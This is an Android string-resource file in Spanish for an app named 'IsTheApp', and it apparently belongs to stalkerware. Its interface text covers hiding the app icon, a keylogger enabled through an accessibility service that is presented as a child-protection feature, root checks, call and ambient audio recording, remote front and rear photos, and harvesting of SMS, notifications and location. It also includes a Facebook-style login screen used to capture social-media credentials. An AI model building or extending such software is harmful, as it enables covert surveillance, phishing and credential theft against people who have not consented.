<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">IsTheApp</string>
    <string name="login_hint_user">Correo</string>
    <string name="login_hint_passw">Contraseña</string>
    <string name="login_btn_sign_in">ENTRAR</string>
    <string name="login_txt_sign_up">¿No tienes cuenta aún? Regístrate</string>
    <string name="login_success">Inicio de sesión exitoso</string>
    <string name="login_failed_try_again_later">Error al iniciar sesión, Inténtelo más tarde</string>
    <string name="login_failed">Error de inicio de sesión</string>
    <string name="logging_in">Iniciando sesión</string>
    <string name="login_btn_sign_up">REGISTRATE</string>
    <string name="sign_up_failed">Registro fallido</string>
    <string name="sign_up_failed_try_again_later">Registro fallido, Inténtelo más tarde</string>
    <string name="register_pass_match">Las contraseñas no coinciden</string>
    <string name="login_hint_passw_repeat">Repite la contraseña</string>
    <string name="maps">Ubicación</string>
    <string name="calls">Llamadas</string>
    <string name="messages">SMS</string>
    <string name="photographic">Cámara</string>
    <string name="sign_out">Cerrar sesión</string>
    <string name="show_app">Mostrar app</string>
    <string name="hide_app">Ocultar app</string>
    <string name="keylog">KeyLog</string>
    <string name="clear_keylogger_list">Limpiar lista KeyLogger</string>
    <string name="duration_default">0:00</string>
    <string name="failed_calls_audios">Error al obtener audios de llamadas</string>
    <string name="failed_sms">Error al recibir mensajes</string>
    <string name="failed_photo">Error al obtener fotos</string>
    <string name="failed_social">Error al obtener credenciales</string>
    <string name="failed_keys_text">Error al obtener keyLogger</string>
    <string name="not_have_audios_yet">Aún no tienes audios.</string>
    <string name="not_have_sms_yet">Aún no tienes mensajes</string>
    <string name="not_have_key_text">Usted no tiene keyLog.</string>
    <string name="not_have_photo_yet">Aún no tienes fotos</string>
    <string name="social">Social</string>
    <string name="setting">Ajustes</string>
    <string name="clear_calls_list">Borrar llamadas</string>
    <string name="clear_sms_list">Borrar mensajes</string>
    <string name="clear_photo_list">Borrar fotos</string>
    <string name="clear_social_credentials">Borrar credenciales</string>
    <string name="closed_for_inactivity">Cerrado por inactividad</string>
    <string name="enable_permission">Permiso habilitado:</string>
    <string name="failed_delete_file">Error al eliminar el archivo</string>
    <string name="failed_delete_files">Error al eliminar archivos</string>
    <string name="delete">Borrar</string>
    <string name="clear">Borrar</string>
    <string name="title_dialog">Mensaje</string>
    <string name="message_dialog_delete_call_audio">¿Quieres eliminar los audios de llamada seleccionados?</string>
    <string name="message_dialog_delete_photo">¿Quieres eliminar las fotos seleccionadas?</string>
    <string name="message_dialog_delete_sms">¿Quieres borrar los mensajes seleccionados?</string>
    <string name="message_dialog_clear_calls">¿Quieres borrar la lista de llamadas?</string>
    <string name="message_dialog_clear_photos">¿Quieres borrar la lista de fotos?</string>
    <string name="message_dialog_clear_credentials">¿Quieres borrar las credenciales?</string>
    <string name="message_dialog_clear_sms">¿Quieres borrar la lista de mensajes?</string>
    <string name="message_dialog_clear_keylogger">¿Desea borrar la lista de registro de pulsaciones?</string>
    <string name="go_to_setting">Ir a ajustes</string>
    <string name="get_front_photo">Obtener foto frontal</string>
    <string name="get_rear_photo">Obtener foto trasera</string>
    <string name="nav_delete_photo">Borrar foto</string>
    <string name="nav_download_photo">Descargar foto</string>
    <string name="ops">Oops! 😢</string>
    <string name="oops">Oops!</string>
    <string name="message_dialog_permission_photo_disable">El permiso para obtener fotos ha sido desactivado.</string>
    <string name="message_permission_social_disable">El permiso para obtener credenciales ha sido desactivado.</string>
    <string name="put_your_access_code">Pon tu código de acceso</string>
    <string name="enable_code_access">Habilitar código de acceso</string>
    <string name="change_code_access">Cambiar código de acceso</string>
    <string name="change">Cambiar</string>
    <string name="note_code_access">Nota: si olvidó el código, deberá eliminar y volver a instalar la aplicación.</string>
    <string name="lock_screen">Bloquear aplicación</string>
    <string name="finish_application_for_inactivity">Finalizar aplicación por inactividad</string>
    <string name="enable_app_finish">Habilitar finalizar aplicación</string>
    <string name="change_app_finish_time">Cambiar tiempo de finalización</string>
    <string name="assigns_a_time_interval_to_terminate_the_application_due_to_inactivity">Asigna un intervalo de tiempo para finalizar la aplicación debido a inactividad. Puede ser necesario reiniciar la aplicación para que tenga efecto.</string>
    <string name="current_access_code">Código de acceso actual</string>
    <string name="new_access_code">Nuevo código de acceso</string>
    <string name="repeat_new_access_code">Repita el nuevo código de acceso</string>
    <string name="one_minute">1 minuto</string>
    <string name="two_minute">2 minutos</string>
    <string name="five_minute">5 minutos</string>
    <string name="error_code_access">Ingrese código de 4 dígitos</string>
    <string name="error_current_code_access">Código actual incorrecto</string>
    <string name="error_not_match_code_access">Los códigos de acceso no coinciden</string>
    <string name="error_database_connection">Error al establecer una conexión con la base de datos.</string>
    <string name="credentials">Credenciales red social</string>
    <string name="email">Usuario:</string>
    <string name="password">Contraseña</string>
    <string name="ellipsis">…</string>
    <string name="volume_up">Por favor suba el volumen</string>
    <string name="failed_device">Dispositivo registrado anteriormente</string>
    <string name="recording">Grabaciones</string>
    <string name="failed_record_audios">Error al obtener grabaciones</string>
    <string name="clear_record_list">Borrar grabaciones</string>
    <string name="message_dialog_record_audio">Asigne el tiempo de grabación</string>
    <string name="message_dialog_delete_record_audio">¿Desea eliminar los audios grabados seleccionados?</string>
    <string name="ten_minute">10 minutos</string>
    <string name="fifteen_minute">15 minutos</string>
    <string name="thirty_minute">30 minutos</string>
    <string name="one_hour">1 hora</string>
    <string name="submit">Enviar</string>
    <string name="msj_snackbar_record">Comando de grabación enviado, espere a que finalice la grabación.</string>
    <string name="message_dialog_clear_record">¿Quieres borrar la lista de grabaciones?</string>
    <string name="message_dialog_clear_notifications">¿Quieres borrar la lista de mensajes de notificación?</string>
    <string name="failed_notifications_text">Falló al obtener mensajes de notificación</string>
    <string name="not_have_notifications_text">No tienes mensajes de notificación.</string>
    <string name="notify">Notificaciones</string>
    <string name="message_dialog_delete_notify">¿Desea borrar los mensajes de notificación seleccionados?</string>
    <string name="ready_to_continue">Inicio de sesión exitoso, todo listo para continuar.</string>
    <string name="checking_root">"Comprobando la raíz y habilitando la accesibilidad de KeyLogger "</string>
    <string name="msg_dialog_enable_keylogger">No se encontró la raíz, habilite la accesibilidad del KeyLogger en \"ajustes - accesibilidad - servicios - accesibilidad child\"</string>
    <string name="msg_dialog_enable_overdraw">Necesitas activar el permiso del sorteo sobre otras aplicaciones para poder tomar fotos.</string>
    <string name="msg_dialog_enable_usage_stats">"Debe activar las aplicaciones con permiso de acceso de uso para obtener credenciales sociales "</string>
    <string name="enable_keylogger_success">"Accesibilidad exitosa a KeyLogger "</string>
    <string name="accessibility_service_label">Accesibilidad child</string>
    <string name="accessibility_service_description">" La accesibilidad child permite a los usuarios evitar o limitar el acceso a su manejo o su contenido a menores de edad"</string>
    <string name="msg_dialog_enable_accessibility_service">"Debe habilitar el servicio de accesibilidad para que la aplicación funcione correctamente. "</string>
    <string name="enable_service">HABILITAR ACCESIBILIDAD DEL SERVICIO</string>
    <string name="enable_usage_stats">HABILITAR ESTADÍSTICAS DE USO</string>
    <string name="address_not_found">Dirección no encontrada</string>
    <string name="hiding">Ocultando…</string>
    <string name="all_fields">Introduce todos los campos</string>
    <string name="enable_overdraw">HABILITAR CAMARA</string>
    <string name="permission_request">Solicitud de permiso</string>
    <string name="message_permission">Se requiere permiso para leer contactos, ubicación, grabar audio, leer el estado del teléfono, recibir sms, cámara y almacenamiento de escritura para esta aplicación. ¿Quieres intentarlo de nuevo?</string>
    <string name="message_permission_never_ask_again">Algunos permisos fueron denegados, sin ellos la aplicación no funcionará correctamente. Para activarlos debe ir a \"Configuración - aplicaciones - permisos secundarios\" y activar los permisos correspondientes. ¿Quieres activarlos ahora?</string>
    <string name="message_permission_storage">Se requiere permiso para leer / escribir almacenamiento para esta aplicación.</string>
    <string name="message_permission_never_ask_again_storage">"El permiso de almacenamiento fue denegado, sin él la aplicación no funcionará correctamente. Para activarlos debe ir a \"Configuración - aplicaciones - IsTheApp - permisos\" y activar los permisos correspondientes. ¿Quieres activarlos ahora? "</string>
    <string name="select_type">Seleccione tipo:</string>
    <string name="enable_service_notification_listener">HABILITAR NOTIFICACIONES DE SERVICIO</string>
    <string name="clear_notify_message_list">Borrar lista de mensajes</string>
    <string name="selected">seleccionado</string>
    <string name="removing">removiendo…</string>
    <string name="email_social">Teléfono o correo electrónico</string>
    <string name="pass_social">Contraseña</string>
    <string name="or">O</string>
    <string name="forgot_password">¿HAS OLVIDADO TU CONTRASEÑA?</string>
    <string name="create_new_facebook_account">Crear cuenta de facebook</string>
    <string name="already_have_account">Ya tengo una cuenta</string>
    <string name="select_child">Seleccione child</string>
    <string name="new_child">Nuevo child</string>
    <string name="activated_success">Activado con éxito!!</string>
    <string name="activating">Activando…</string>
    <string name="add_to_whitelist">AGREGAR A LISTA BLANCA</string>
    <string name="already_activated">Ya activado</string>
    <string name="change_photo">Cambiar Foto</string>
    <string name="characters_child">Contiene caracteres invalidos</string>
    <string name="check_root_access">Comprobando el acceso raíz</string>
    <string name="disable_keylogger">Keylogger deshabilitado</string>
    <string name="disable_notification_message">Mensaje de notificación deshabilitado</string>
    <string name="disable_photo">Deshabilitado obtener fotos</string>
    <string name="disable_recording">Grabación de entorno deshabilitada</string>
    <string name="disable_social">Deshabilitado obtener credenciales</string>
    <string name="disabled_gps">GPS deshabilitado</string>
    <string name="enable_all_permissions">Por favor habilite todos los permisos</string>
    <string name="enable_keylogger">Keylogger habilitado</string>
    <string name="enable_notification_message">Mensaje de notificación habilitado</string>
    <string name="enable_photo">Habilitado obtener fotos</string>
    <string name="enable_recording">Grabación de entorno habilitada</string>
    <string name="enable_social">Habilitado obtener credenciales</string>
    <string name="enabled_gps">GPS habilitado</string>
    <string name="failed_activate">Error al activar, intente nuevamente.</string>
    <string name="get_childs">Obteniendo childs…</string>
    <string name="maps_installed">Aplicación de mapas de Google no instalada</string>
    <string name="message_dialog_permission_location_disable">El permiso de ubicación ha sido deshabilitado.</string>
    <string name="new_or_current_child">Nuevo o actual child</string>
    <string name="search_calls">Buscar llamadas</string>
    <string name="search_keys">Buscar keylog</string>
    <string name="search_notify">Buscar notificaciones</string>
    <string name="search_photos">Buscar fotos</string>
    <string name="search_records">Buscar grabación</string>
    <string name="search_sms">Buscar sms</string>
    <string name="upload_photo_child">Subiendo foto…</string>
    <string name="search_photos_date">Buscar fotos por fecha</string>
    <string name="search_records_date">Buscar grabación por fecha</string>
    <string name="msj_snackbar_current_record">Tienes una grabación pendiente</string>
    <string name="recording_go">Grabando…</string>
</resources>
